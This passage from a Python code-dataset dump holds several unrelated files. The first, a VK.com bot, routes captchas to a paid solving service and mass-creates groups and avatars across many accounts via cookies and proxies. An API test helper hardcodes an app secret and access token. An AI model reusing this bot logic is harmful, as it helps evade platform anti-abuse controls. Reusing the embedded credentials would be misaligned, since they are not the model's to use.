\"4517fb23f10056ec2141bba9a7a158e6\"\n\t\ta_captchaID = vk_captcha._send_captcha(page, root_path, key) #antigate captcha ID [OK, 406704123]\n\t\tif a_captchaID[0] != \"OK\":\n\t\t\tprint(\"Неудалось отправить запрос на antigate\\n%s\" % a_captchaID)\n\t\t\treturn 0\n\t\twhile True:\n\t\t\ttime.sleep(7)\n\t\t\ta_captchaRESULT = vk_captcha._check_captcha(a_captchaID[1], key) #antigate captcah RESULT [OK, Fgv4Kl]\n\t\t\tif a_captchaRESULT[0] != \"OK\":\n\t\t\t\tcontinue\n\t\t\tprint(\"Готово. 
%s\" % a_captchaRESULT[1])\n\t\t\treturn a_captchaRESULT[1]\n\t\t\n\n\tdef _send_captcha(page, root_path, key):\n\t\t\"\"\"Получает страницу, возвращает массив формата [OK, 406704123]\"\"\"\n\t\timg_tag = page.find(id=\"captcha\") \n\t\tif not img_tag:\n\t\t\timg_tag = page.find(\"img\", {\"class\":\"captcha_img\"})\n\t\tif not img_tag:\n\t\t\tprint(\"Тега с id=captcha не найдено\")\n\t\t\treturn 0\n\t\timg = vk_captcha.request_with_retry(root_path + img_tag[\"src\"]).content\n\t\tdata = {\n\t\t\t\"key\": key,\n\t\t\t\"method\": \"post\",\n\t\t}\n\t\tresponse = vk_captcha.request_with_retry('http://antigate.com/in.php', data=data, files={\"file\": img}) \n\t\treturn (response.text.split(\"|\"))\n\n\tdef _check_captcha(captcha_id, key):\n\t\tresponse = vk_captcha.request_with_retry(\"http://antigate.com/res.php?key=\" + key + \"&action=get&id=\" + captcha_id)\n\t\treturn (response.text.split('|'))\n\n\tdef request_with_retry(url, data=\"\", files=\"\"):\n\t\tTIMEOUT = 0.5\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tif data or files:\n\t\t\t\t\tresponse = requests.post(url, data=data, files=files, timeout=TIMEOUT)\n\t\t\t\telse:\n\t\t\t\t\tresponse = requests.get(url, timeout=TIMEOUT)\n\t\t\texcept requests.exceptions.ReadTimeout:\n\t\t\t\tcontinue\n\t\t\tbreak\n\t\treturn response\n\t\n\nclass vk_session:\n\tdef __init__(self, root_path, proxy=\"\", cookies=\"\"):\n\t\tself.is_signed = False\n\t\tself.proxy = proxy\n\t\tself.root_path = root_path\n\t\tsession = requests.session()\n\t\tif proxy:\n\t\t\tsession.proxies.update({'http': 'http://' + proxy, 'ssl': proxy ,'https': 'https://' + proxy})\n\t\theaders = {\n\t\t\t\"ACCEPT\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\n\t\t\t\"ACCEPT_ENCODING\": \"gzip, deflate, sdch\",\n\t\t\t\"ACCEPT_LANGUAGE\": \"ru-RU,ru;\",\n\t\t\t\"CONNECTION\": \"keep-alive\",\n\t\t\t\"REFERER\": root_path,\n\t\t\t\"UPGRADE_INSECURE_REQUESTS\": \"1\",\n\t\t\t'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36',\n\t\t}\n\t\tsession.headers = headers\n\t\tif cookies:\n\t\t\tsession.cookies = cookies\n\t\tself.browser = RoboBrowser(session=session, timeout=4, history=False)\n\n\tdef connect(self):\n\t\t\n\t\tself.browser.open(self.root_path) \t\n\t\tprint(\"connected\")\n\n\t\t\n\tdef sign_in(self, username, password, captcha):\n\t\ttry:\n\t\t\tform = self.browser.get_forms()[0]\n\n\t\t\tform[\"email\"] = username\n\t\t\tform[\"pass\"] = password\n\t\t\tif captcha:\n\t\t\t\tform[\"captcha_key\"] = vk_captcha.decode(page=self.browser.parsed, root_path=self.root_path)\n\t\t\tself.browser.submit_form(form)\n\t\texcept:\n\t\t\tprint(username)\n\t\t\traise\n\n\tdef create_new_group(self, name, group_type, public_type):\n\t\tself.browser.open(\"https://m.vk.com/groups?act=new\")\n\t\tform = self.browser.get_forms()[0]\n\t\tform[\"title\"] = name\n\t\tform[\"type\"] = group_type\n\t\tform[\"public_type\"] = public_type\n\t\tself.browser.submit_form(form)\n\t\ttime.sleep(1)\n\n\tdef enter_captcha(self):\n\t\tform = self.browser.get_forms()[0]\n\t\tform[\"captcha_key\"] = vk_captcha.decode(page=self.browser.parsed, root_path=self.root_path)\n\t\tself.browser.submit_form(form)\n\nclass sup_func:\n\t\"\"\"Вспомогательные функции\"\"\"\n\n\tdef img_paths_list(path=\"data/content/images\"):\n\t\t\"\"\"Получет путь к каталогу с папками с картинками, возвращает их относ. 
пути\"\"\"\n\t\timg_rel_paths = []\n\t\tfor directory in os.listdir(path):\n\t\t\timg_dir_path = path + \"/\"\n\t\t\timg_dir_path += directory\n\t\t\tfor f in os.listdir(img_dir_path):\n\t\t\t\timg_path = img_dir_path + \"/\" + f\n\t\t\t\timg_rel_paths.append(os.path.abspath(img_path))\n\n\t\treturn img_rel_paths\n\n\tdef random_img_binary(img_rel_paths=img_paths_list()):\n\t\trandom_img = random.choice(img_rel_paths)\n\t\tbinary_img = open(random_img, \"rb\")\n\t\treturn binary_img\n\n\tdef random_img(img_rel_paths=img_paths_list()):\n\t\trandom_img = random.choice(img_rel_paths)\n\t\treturn random_img\n\n\tdef open_page_with_retries(page, upload_url):\n\t\tfor i in range(5) :\n\t\t\tpage.open(upload_url)\n\t\t\tif \"service_msg_warning\" in page.parsed:\n\t\t\t\twait_time = 5 * (i + 1)\n\t\t\t\tprint(\"service_msg_warning: Одинаковые обращения | ожидаем %s\" % wait_time)\n\t\t\t\ttime.sleep(wait_time)\n\t\t\t\tcontinue\n\t\t\treturn page\n\n\tdef avatar_retry_decorator(post_func):\n\t\tdef wrapper(arg1, arg2):\n\t\t\tRETRY_TIMES = 5\n\t\t\tWAIT_STEP = 5\n\t\t\tfor i in range(RETRY_TIMES):\n\t\t\t\ttry:\t\t\n\t\t\t\t\tpost_func(arg1, arg2)\n\t\t\t\t\tbreak\n\t\t\t\texcept IndexError:\n\t\t\t\t\twait_time = (i + 1) * WAIT_STEP\n\t\t\t\t\ttime.sleep(wait_time)\n\t\t\t\t\tprint(\"Не удалось загрузить аватар | попытка %s/%s | ожидаем %s\" % (i + 1, RETRY_TIMES, wait_time))\n\t\treturn wrapper\n\n\n\t\n\nclass AllUsersControll:\n\t\"\"\"Методы для управления всеми аккаунтами\"\"\"\n\tdef start_driver(proxy=\"\"):\n\t\tfor i in range(5):\n\t\t\ttry:\n\t\t\t\tif proxy:\n\t\t\t\t\traise #посмотреть serv ad, port num\n\t\t\t\t\tproxy = proxy.split(\":\")\n\t\t\t\t\tserver_adress = proxy[0] \n\t\t\t\t\tport_number = int(proxy[1])\n\t\t\t\t\tprofile = selenium.webdriver.FirefoxProfile()\n\t\t\t\t\tprofile.set_preference(\"network.proxy.type\", 1)\n\t\t\t\t\tprofile.set_preference(\"network.proxy.http\", server_adress)\n\t\t\t\t\tprofile.set_preference(\"network.proxy.http_port\", port_number)\n\t\t\t\t\tprofile.set_preference('network.proxy.ssl_port', port_number)\n\t\t\t\t\tprofile.set_preference('network.proxy.ssl', server_adress)\n\t\t\t\t\tprofile.update_preferences()\n\t\t\t\t\tdriver = selenium.webdriver.Firefox(firefox_profile=profile)\n\t\t\t\telse:\n\t\t\t\t\tdriver = selenium.webdriver.Firefox()\n\t\t\t\tbreak\n\t\t\texcept selenium.common.exceptions.WebDriverException:\n\t\t\t\ttime.sleep(3)\n\t\t\t\tprint(\"Не удалось открыть selenium firefox в api.py/AllUsersControll.start_driver()\")\n\t\t\t\tcontinue\n\n\t\treturn driver\n\n\tdef set_cookies_to_driver(driver, cookies):\n\t\tdriver.delete_all_cookies()\n\t\tdriver.get(\"https://m.vk.com/\")\n\t\tfor cookie in cookies:\n\t\t\tdriver.add_cookie({'name':cookie, 'value':cookies[cookie]})\n\t\t#driver.get(\"https://m.vk.com/\")\n\t\treturn driver\n\n\t@sup_func.avatar_retry_decorator\n\tdef _change_avatar_with_driver(group, driver):\n\t\t\"\"\"driver должен быть signed in\"\"\"\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tdriver.get(\"https://m.vk.com/\" + group.group_id)\n\t\t\t\tinput_elem = driver.find_element_by_class_name(\"inline_upload\")\n\t\t\t\timg = sup_func.random_img()\n\t\t\t\tinput_elem.send_keys(img)\n\t\t\t\ttime.sleep(1)\n\t\t\t\tbreak\n\t\t\texcept selenium.common.exceptions.NoSuchElementException:\n\t\t\t\tprint('слишком много однотипных действий sleep 7s')\n\t\t\t\ttime.sleep(7)\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tsave_button = 
save_button = driver.find_element_by_id(\"zpv_save_button\")\n\t\t\t\tsave_button.click()\n\t\t\t\ttime.sleep(3)\n\t\t\t\tcontinue\n\t\t\texcept:\n\t\t\t\tbreak\n\t\ttime.sleep(1)\n\t\treturn 1\n\n\tdef upload_avatar_to_new(group, driver):\n\t\tAllUsersControll._change_avatar_with_driver(group, driver)\n\n\n\tdef upload_avatars_to_all(users, driver=\"\"):\n\t\tif not driver:\n\t\t\tdriver = AllUsersControll.start_driver()\n\t\tfor user in users:\n\t\t\tdriver = AllUsersControll.set_cookies_to_driver(driver, user.get_cookies())\n\t\t\tfor group in user.groups:\n\t\t\t\tAllUsersControll._change_avatar_with_driver(group, driver)\n\n\tdef make_message(targ):\n\t\tmessage = \"%s\\n@id%s(%s %s ©)\" % (targ[\"status\"], targ[\"id\"], targ[\"first_name\"], targ[\"last_name\"])\n\t\treturn message\n\n\n\n\n\n\n# \tdef get_all_users(path=\"data/accounts.json\"):\n# \t\twith open(path,\"r\") as f:\n# \t\t\taccounts = f.read()\n# \t\t\tif not accounts:\n# \t\t\t\treturn 0 # the accounts.json file is empty\n# \t\t\taccounts = json.loads(accounts)\n# \t\tall_users = []\n# \t\tfor account in accounts:\n# \t\t\tall_users.append(User(account, accounts[account]))\n# \t\treturn all_users\n\n# \tdef get_all_exists_groups(users=get_all_users()):\n# \t\tall_groups = []\n# \t\tfor user in users:\n# \t\t\tsession = user.session\n# \t\t\tset_session_to_driver(driver, session)\n# \t\t\tfor group in user.groups:\n# \t\t\t\tall_groups.append(group)\n# \t\treturn all_groups\n\n\n# \tdef upload_avatars_to_new_groups(users=get_all_users()):\n# \t\t\"\"\"Uses Selenium to run js scripts\"\"\"\n# \t\tdriver = start_driver() # Initialize the driver once up front; for each user we only swap the session\n# \t\tfor group in get_all_exists_groups():\n\n\n\n#
 You tried to load more than one page of the same type per second. Go back and try again.
\n\n\n\n\n\nif __name__ == \"__main__\":\n\tprint(sup_func.random_img_binary())\n\n\n\n\n\n\n\t\n\n\n\n\n\n\n\n\n\t\t\n\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":9495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"}
{"seq_id":"416558850","text":"import tensorflow as tf\nimport rl_env as rl\n\nclass DQNAnn(rl.Agents.AbstractANN):\n    def __init__(self, nb_entry, nb_hiddens, nb_out, scope=\"\"):\n        self.nb_entry = nb_entry\n        self.nb_hiddens = nb_hiddens\n        self.nb_out = nb_out\n        super(DQNAnn, self).__init__(scope)\n\n    def _create_ann(self):\n        self.input = tf.placeholder(tf.float32, [None, self.nb_entry])\n        last = self.input\n        for it in self.nb_hiddens:\n            last = tf.layers.dense(last, it, tf.nn.relu)\n        self.output = tf.layers.dense(last, self.nb_out)\n","sub_path":"Learning/DQNAnn.py","file_name":"DQNAnn.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"}
{"seq_id":"52846448","text":"from functools import reduce\nfrom typing import List\n\nclass Solution:\n\n    # def reducer(self, s1, s2):\n    #     L = 0\n    #     for x in range(min(len(s1), len(s2))):\n    #         if s1[x] != s2[x]:\n    #             break\n    #         L += 1\n    #     return s1[:L]\n\n    # def longestCommonPrefix(self, strs: List[str]) -> str:\n    #     if not strs:\n    #         return \"\"\n    #     return reduce(self.reducer, strs)\n\n    def longestCommonPrefix(self, strs:List[str]) -> str:\n        prefix = \"\"\n        if not strs:\n            return prefix\n\n        min_length = min([len(s) for s in strs])\n\n        for i in range(min_length):\n            if len(set(s[i] for s in strs)) == 1:\n                prefix += strs[0][i]\n            else:\n                break\n        return prefix\n\n\nif __name__ == \"__main__\":\n    print(Solution().longestCommonPrefix([\"flower\",\"flow\",\"flight\"]))\n    print(Solution().longestCommonPrefix([\"aa\", \"ab\"]))\n","sub_path":"LeetCode/top-interview-questions-easy/strings/longest-common-prefix.py","file_name":"longest-common-prefix.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"}
{"seq_id":"532973800","text":"import tools.importer\n\nSHEET_ID_DEV = \"1GDYUsjtJMub8Gh_hZMu4UQw6hAVmtUh6E0rS9dlUl3o\"\nSHEET_ID_PROD = \"1N1qLMoWyi3WFGhIpPFzKsFmVE0IwNP3elb_c18t2DwY\"\n\nSHEET_ID = SHEET_ID_PROD\n\nRANGE_STATS = \"Statistika!A3:BT\"\n\nif __name__ == \"__main__\":\n    tools.importer.sheet2csv(\n        id=SHEET_ID, range=RANGE_STATS, filename=\"data/full.csv\",\n    )\n\n","sub_path":"update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"}
{"seq_id":"418281590","text":"import numpy as np\nimport json\nimport os\nimport matplotlib.pyplot as plt\nimport torch\n\nlabels = ['Background', 'Knife', 'Horse', 'Human body']\n\n\ndef compute_overlap(a, b):\n    \"\"\"\n    Parameters\n    ----------\n    a: (N, 4) ndarray of float\n    b: (K, 4) ndarray of float\n    Returns\n    -------\n    overlaps: (N, K) ndarray of overlap between boxes and query_boxes\n    \"\"\"\n    area = (b[:, 2] - b[:, 0]) * (b[:, 3] - b[:, 1])\n\n    iw = np.minimum(np.expand_dims(a[:, 2], axis=1), b[:, 2]) - np.maximum(np.expand_dims(a[:, 0], 1), b[:, 0])\n    ih = np.minimum(np.expand_dims(a[:, 3], axis=1), b[:, 3]) - np.maximum(np.expand_dims(a[:, 1], 1), b[:, 1])\n\n    iw = np.maximum(iw, 0)\n    ih = np.maximum(ih, 0)\n\n    ua = np.expand_dims((a[:, 2] - a[:, 0]) * (a[:, 3] - a[:, 1]), axis=1) + area - iw * ih\n\n    ua = np.maximum(ua, np.finfo(float).eps)\n\n    
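# IoU for every (a, b) pair: clipped intersection area divided by the union area ua\n    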
intersection = iw * ih\n\n return intersection / ua\n\n\ndef _compute_ap(recall, precision):\n \"\"\" Compute the average precision, given the recall and precision curves.\n Code originally from https://github.com/rbgirshick/py-faster-rcnn.\n \"\"\"\n # correct AP calculation\n # first append sentinel values at the end\n mrec = np.concatenate(([0.], recall, [1.]))\n mpre = np.concatenate(([0.], precision, [0.]))\n\n # compute the precision envelope\n for i in range(mpre.size - 1, 0, -1):\n mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])\n\n # to calculate area under PR curve, look for points\n # where X axis (recall) changes value\n i = np.where(mrec[1:] != mrec[:-1])[0]\n\n # and sum (\\Delta recall) * prec\n ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])\n return ap\n\n\ndef evaluate_model(all_detections, all_annotations, iou_threshold=0.5):\n average_precisions = {}\n p_r = {}\n\n for label in range(4):\n false_positives = np.zeros((0,))\n true_positives = np.zeros((0,))\n scores = np.zeros((0,))\n num_annotations = 0.0\n\n for i in range(len(all_annotations)):\n detections = []\n annotations = []\n\n for _, xmin, ymin, xmax, ymax, conf, class_id in all_detections[i]:\n if int(class_id) == label:\n detections.append([xmin, ymin, xmax, ymax])\n scores = np.append(scores, float(conf))\n\n if int(all_annotations[i][5]) == label:\n annotations = [[all_annotations[i][1], all_annotations[i][2], all_annotations[i][3], all_annotations[i][4]]]\n\n detections = np.array(detections, dtype='int')\n annotations = np.array(annotations, dtype='int')\n\n num_annotations += len(annotations)\n detected_annotations = []\n\n for d in detections:\n if len(annotations) == 0:\n false_positives = np.append(false_positives, 1)\n true_positives = np.append(true_positives, 0)\n continue\n\n overlaps = compute_overlap(np.expand_dims(d, axis=0), annotations)\n assigned_annotation = np.argmax(overlaps, axis=1)\n max_overlap = overlaps[0, assigned_annotation]\n\n if max_overlap >= iou_threshold and assigned_annotation not in detected_annotations:\n false_positives = np.append(false_positives, 0)\n true_positives = np.append(true_positives, 1)\n detected_annotations.append(assigned_annotation)\n else:\n false_positives = np.append(false_positives, 1)\n true_positives = np.append(true_positives, 0)\n\n if num_annotations == 0:\n average_precisions[label] = 0, 0\n p_r[label] = [], []\n continue\n\n # sort by score\n # indices = np.argsort(-scores)\n indices = np.argsort(-scores)\n false_positives = false_positives[indices]\n true_positives = true_positives[indices]\n\n # compute false positives and true positives\n false_positives = np.cumsum(false_positives)\n true_positives = np.cumsum(true_positives)\n\n # compute recall and precision\n recall = true_positives / num_annotations\n precision = true_positives / np.maximum(true_positives + false_positives, np.finfo(np.float64).eps)\n\n # compute average precision\n average_precision = _compute_ap(recall, precision)\n average_precisions[label] = average_precision, num_annotations\n p_r[label] = precision, recall\n\n map = 0.0\n for i in range(1, 4):\n map += average_precisions[i][0]\n map /= 3\n\n print('\\nmAP: ', map)\n for label in range(1, 4):\n label_name = labels[label]\n if not label_name.isnumeric():\n print(label_name)\n print(\"AP: \" + str(average_precisions[label][0]))\n precision, recall = p_r[label]\n print(\"Precision: \", precision[-1] if len(precision) > 0 else 0)\n print(\"Recall: \", recall[-1] if len(recall) > 0 else 0)\n\n return 
average_precisions\n","sub_path":"model/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":5028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"}
{"seq_id":"283573329","text":"# evolution strategy (mu + lambda) of the ackley objective function\nfrom numpy import asarray, exp, sqrt, cos, e, pi, argsort\nfrom numpy.random import randn, rand, seed\n\n# objective function\ndef objective(v):\n\tx, y = v\n\treturn -20.0 * exp(-0.2 * sqrt(0.5 * (x**2 + y**2))) - exp(0.5 * (cos(2 * pi * x) + cos(2 * pi * y))) + e + 20\n\n# check if a point is within the bounds of the search\ndef in_bounds(point, bounds):\n\t# enumerate all dimensions of the point\n\tfor d in range(len(bounds)):\n\t\t# check if out of bounds for this dimension\n\t\tif point[d] < bounds[d, 0] or point[d] > bounds[d, 1]:\n\t\t\treturn False\n\treturn True\n\n# evolution strategy (mu + lambda) algorithm\ndef es_plus(objective, bounds, n_iter, step_size, mu, lam):\n\tbest, best_eval = None, 1e+10\n\t# calculate the number of children per parent\n\tn_children = int(lam / mu)\n\t# initial population\n\tpopulation = list()\n\tfor _ in range(lam): # for each citizen of current population\n\t\tcandidate = None\n\t\twhile candidate is None or not in_bounds(candidate, bounds):\n\t\t\t### bounds[:, 0] - select first column\n\t\t\tcandidate = bounds[:, 0] + rand(len(bounds)) * (bounds[:, 1] - bounds[:, 0])\n\t\tpopulation.append(candidate)\n\t\n\t# perform the search\n\tfor epoch in range(n_iter):\n\t\t# evaluate fitness for the population\n\t\tscores = [objective(c) for c in population]\n\n\t\t# numpy.argsort - Returns the indices that would sort an array.\n\t\tmedium = argsort(scores)\t# indices ordered from the smallest score to the largest\n\t\t\n\t\t# rank scores in ascending order\n\t\tranks = argsort(argsort(scores))\n\t\t# select the indexes for the top mu ranked solutions\n\t\tselected = [count for count,_ in enumerate(ranks) if ranks[count] < mu]\n\t\t# create children from parents\n\t\tchildren = list()\n\t\tfor i in selected:\n\t\t\t# check if this parent is the best solution ever seen\n\t\t\tif scores[i] < best_eval:\n\t\t\t\tbest, best_eval = population[i], scores[i]\n\t\t\t\tprint('Epoch %d, best individual so far: f(%s) = %.5f' % (epoch, best, best_eval))\n\t\t\t\n\t\t\t# keep the parent\n\t\t\tchildren.append(population[i])\n\t\t\t# create children for parent\n\t\t\tfor _ in range(n_children):\n\t\t\t\tchild = None\n\t\t\t\twhile child is None or not in_bounds(child, bounds):\n\t\t\t\t\tchild = population[i] + randn(len(bounds)) * step_size\n\t\t\t\tchildren.append(child)\n\t\t# replace population with children\n\t\tpopulation = children\n\treturn [best, best_eval]\n\n# seed the pseudorandom number generator\nseed(1)\n# define range for input\nbounds = asarray([[-5.0, 5.0], [-5.0, 5.0]])\n# define the total iterations\nn_iter = 5000\n# define the maximum step size\nstep_size = 0.15\n# number of parents selected\nmu = 5\n# the number of children generated by parents\nlam = 10\n# perform the evolution strategy (mu + lambda) search\nbest, score = es_plus(objective, bounds, n_iter, step_size, mu, lam)\nprint('Done!')\nprint('f(%s) = %f' % (best, score))","sub_path":"esPlus_template.py","file_name":"esPlus_template.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"}
{"seq_id":"539648278","text":"import requests\nimport json\n\n\ndef get_all_gra_choice_answer(list, taskID=1):\n    url = 
\"http://192.168.1.154:55262/sysGrammar/{}/mulChoice\".format(list)\n querystring = {\"taskID\": \"{}\".format(taskID)}\n headers = {\n 'platform': \"Android\",\n 'appversion': \"1.0\",\n 'appkey': \"Cet_E94A599B77DA\",\n 'app': \"cee\",\n 'appsecret': \"8548C4F6-96F1-4E37-ADD6-89BEF5478B9B\",\n 'accesstoken': \"b9e93792-d6f9-4e5d-bd80-f00bead144e1\",\n 'host': \"192.168.1.154:55262\",\n 'connection': \"Keep-Alive\",\n 'accept-encoding': \"gzip\",\n 'user-agent': \"okhttp/3.7.0\",\n 'cache-control': \"no-cache\",\n }\n\n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n answer = response.text\n json_data = json.loads(answer)\n result = json_data.pop(\"data\").pop('questGuide')\n word_answers = []\n for a in result:\n word_answers.append(a.pop('questAnswer'))\n print(\"Database_answers:\", word_answers)\n return word_answers\n\n\ndef right_answer_gra_choice(answer, num):\n get_answer = answer[:]\n right_answer = get_answer.pop(int(num)-1)\n return right_answer\n\n\ndef wrong_answer_gra_choice(answer, num):\n get_answer = answer[:]\n test = get_answer.pop(int(num)-1)\n wrong_answer = []\n if (ord(test) + 1) <= 68:\n wrong_answer.append(chr(ord(test) + 1))\n else:\n wrong_answer.append(chr(ord(test) -1))\n return \"\".join(wrong_answer)\n\n#\n# answer = get_all_gra_choice_answer(list=1533, taskID=1)\n# print(right_answer_gra_choice(answer, 6))\n# print(wrong_answer_gra_choice(answer, 6))\n","sub_path":"testcase/interface/reading/sen_analysis/get_all_sen_analysis_answer.py","file_name":"get_all_sen_analysis_answer.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"290876697","text":"# -*- coding: utf-8 -*-\nimport click\nimport json\nimport logging\nimport os\nimport shutil\nimport sys\nimport warnings\n\nfrom great_expectations.cli.init_messages import (\n BUILD_DOCS_PROMPT,\n COMPLETE_ONBOARDING_PROMPT,\n GREETING,\n LETS_BEGIN_PROMPT,\n NEW_TEMPLATE_INSTALLED,\n NEW_TEMPLATE_PROMPT,\n NO_DATASOURCES_FOUND,\n ONBOARDING_COMPLETE,\n PROJECT_IS_COMPLETE,\n RUN_INIT_AGAIN,\n SLACK_LATER,\n SLACK_SETUP_INTRO,\n SLACK_SETUP_COMPLETE,\n SLACK_SETUP_PROMPT,\n SLACK_WEBHOOK_PROMPT,\n)\nfrom .datasource import (\n add_datasource as add_datasource_impl,\n profile_datasource,\n build_docs as build_documentation_impl,\n MSG_GO_TO_NOTEBOOK,\n)\nfrom great_expectations.cli.util import cli_message, is_sane_slack_webhook\nfrom great_expectations.data_context import DataContext\nfrom great_expectations.data_asset import FileDataAsset\nfrom great_expectations.dataset import Dataset, PandasDataset\nimport great_expectations.exceptions as ge_exceptions\nfrom great_expectations import __version__ as ge_version\nfrom great_expectations import read_csv\n#FIXME: This prevents us from seeing a huge stack of these messages in python 2. We'll need to fix that later.\n# tests/test_cli.py::test_cli_profile_with_datasource_arg\n# /Users/abe/Documents/superconductive/tools/great_expectations/tests/test_cli.py:294: Warning: Click detected the use of the unicode_literals __future__ import. This is heavily discouraged because it can introduce subtle bugs in your code. You should instead use explicit u\"\" literals for your unicode strings. 
For more information see https://click.palletsprojects.com/python3/\n# cli, [\"profile\", \"my_datasource\", \"-d\", project_root_dir])\nclick.disable_unicode_literals_warning = True\n\n\nwarnings.filterwarnings('ignore')\n\ntry:\n from termcolor import colored\nexcept ImportError:\n colored = None\n\n\n# Take over the entire GE module logging namespace when running CLI\nlogger = logging.getLogger(\"great_expectations\")\n\n# class NaturalOrderGroup(click.Group):\n# def __init__(self, name=None, commands=None, **attrs):\n# if commands is None:\n# commands = OrderedDict()\n# elif not isinstance(commands, OrderedDict):\n# commands = OrderedDict(commands)\n# click.Group.__init__(self, name=name,\n# commands=commands,\n# **attrs)\n#\n# def list_commands(self, ctx):\n# return self.commands.keys()\n\n# TODO: consider using a specified-order supporting class for help (but wasn't working with python 2)\n# @click.group(cls=NaturalOrderGroup)\n@click.group()\n@click.version_option(version=ge_version)\n@click.option('--verbose', '-v', is_flag=True, default=False,\n help='Set great_expectations to use verbose output.')\ndef cli(verbose):\n \"\"\"great_expectations command-line interface\"\"\"\n if verbose:\n logger.setLevel(logging.DEBUG)\n\n\n@cli.command()\n@click.argument('dataset')\n@click.argument('expectation_suite_file')\n@click.option('--evaluation_parameters', '-p', default=None,\n help='Path to a file containing JSON object used to evaluate parameters in expectations config.')\n@click.option('--result_format', '-o', default=\"SUMMARY\",\n help='Result format to use when building evaluation responses.')\n@click.option('--catch_exceptions', '-e', default=True, type=bool,\n help='Specify whether to catch exceptions raised during evaluation of expectations (defaults to True).')\n@click.option('--only_return_failures', '-f', default=False, type=bool,\n help='Specify whether to only return expectations that are not met during evaluation '\n '(defaults to False).')\n@click.option('--custom_dataset_module', '-m', default=None,\n help='Path to a python module containing a custom dataset class.')\n@click.option('--custom_dataset_class', '-c', default=None,\n help='Name of the custom dataset class to use during evaluation.')\ndef validate(\n dataset,\n expectation_suite_file,\n evaluation_parameters,\n result_format,\n catch_exceptions, only_return_failures, custom_dataset_module, custom_dataset_class):\n \"\"\"Validate a CSV file against an expectation suite.\n\n DATASET: Path to a file containing a CSV file to validate using the provided expectation_suite_file.\n\n EXPECTATION_SUITE_FILE: Path to a file containing a valid great_expectations expectations suite to use to \\\nvalidate the data.\n \"\"\"\n\n \"\"\"\n Read a dataset file and validate it using an expectation suite saved in another file. Uses parameters defined in \n the dispatch method.\n\n :param parsed_args: A Namespace object containing parsed arguments from the dispatch method.\n :return: The number of unsuccessful expectations\n \"\"\"\n expectation_suite_file = expectation_suite_file\n\n expectation_suite = json.load(open(expectation_suite_file))\n\n if evaluation_parameters is not None:\n evaluation_parameters = json.load(\n open(evaluation_parameters, \"r\"))\n\n # Use a custom data_asset module and class if provided. 
Otherwise infer from the expectation suite\n if custom_dataset_module:\n sys.path.insert(0, os.path.dirname(\n custom_dataset_module))\n module_name = os.path.basename(\n custom_dataset_module).split('.')[0]\n custom_module = __import__(str(module_name))\n dataset_class = getattr(\n custom_module, custom_dataset_class)\n elif \"data_asset_type\" in expectation_suite:\n if (expectation_suite[\"data_asset_type\"] == \"Dataset\" or\n expectation_suite[\"data_asset_type\"] == \"PandasDataset\"):\n dataset_class = PandasDataset\n elif expectation_suite[\"data_asset_type\"].endswith(\"Dataset\"):\n logger.info(\"Using PandasDataset to validate dataset of type %s.\" %\n expectation_suite[\"data_asset_type\"])\n dataset_class = PandasDataset\n elif expectation_suite[\"data_asset_type\"] == \"FileDataAsset\":\n dataset_class = FileDataAsset\n else:\n logger.critical(\"Unrecognized data_asset_type %s. You may need to specify custom_dataset_module and \\\n custom_dataset_class.\" % expectation_suite[\"data_asset_type\"])\n return -1\n else:\n dataset_class = PandasDataset\n\n if issubclass(dataset_class, Dataset):\n da = read_csv(dataset, expectation_suite=expectation_suite,\n dataset_class=dataset_class)\n else:\n da = dataset_class(dataset, config=expectation_suite)\n\n result = da.validate(\n evaluation_parameters=evaluation_parameters,\n result_format=result_format,\n catch_exceptions=catch_exceptions,\n only_return_failures=only_return_failures,\n )\n\n # Note: Should this be rendered through cli_message?\n # Probably not, on the off chance that the JSON object contains tags\n print(json.dumps(result, indent=2))\n sys.exit(result['statistics']['unsuccessful_expectations'])\n\n\n@cli.command()\n@click.option(\n '--target_directory',\n '-d',\n default=\"./\",\n help='The root of the project directory where you want to initialize Great Expectations.'\n)\n@click.option(\n # Note this --no-view option is mostly here for tests\n \"--view/--no-view\",\n help=\"By default open in browser unless you specify the --no-view flag\",\n default=True\n)\ndef init(target_directory, view):\n \"\"\"\n Create a new project and help with onboarding.\n\n This guided input walks the user through setting up a new project and also\n onboards a new developer in an existing project.\n\n It scaffolds directories, sets up notebooks, creates a project file, and\n appends to a `.gitignore` file.\n \"\"\"\n target_directory = os.path.abspath(target_directory)\n ge_dir = _get_full_path_to_ge_dir(target_directory)\n ge_yml = os.path.join(ge_dir, DataContext.GE_YML)\n\n cli_message(GREETING)\n\n # TODO this should be a property\n if os.path.isfile(ge_yml):\n if DataContext.all_uncommitted_directories_exist(ge_dir) and \\\n DataContext.config_variables_yml_exist(ge_dir):\n # Ensure the context can be instantiated\n try:\n _ = DataContext(ge_dir)\n cli_message(PROJECT_IS_COMPLETE)\n except ge_exceptions.DataContextError as e:\n cli_message(\"{}\".format(e))\n exit(5)\n else:\n _complete_onboarding(target_directory)\n\n try:\n # if expectations exist, offer to build docs\n context = DataContext(ge_dir)\n if context.list_expectation_suite_keys():\n if click.confirm(BUILD_DOCS_PROMPT, default=True):\n context.build_data_docs()\n context.open_data_docs()\n except ge_exceptions.DataContextError as e:\n cli_message(\"{}\".format(e))\n else:\n if not 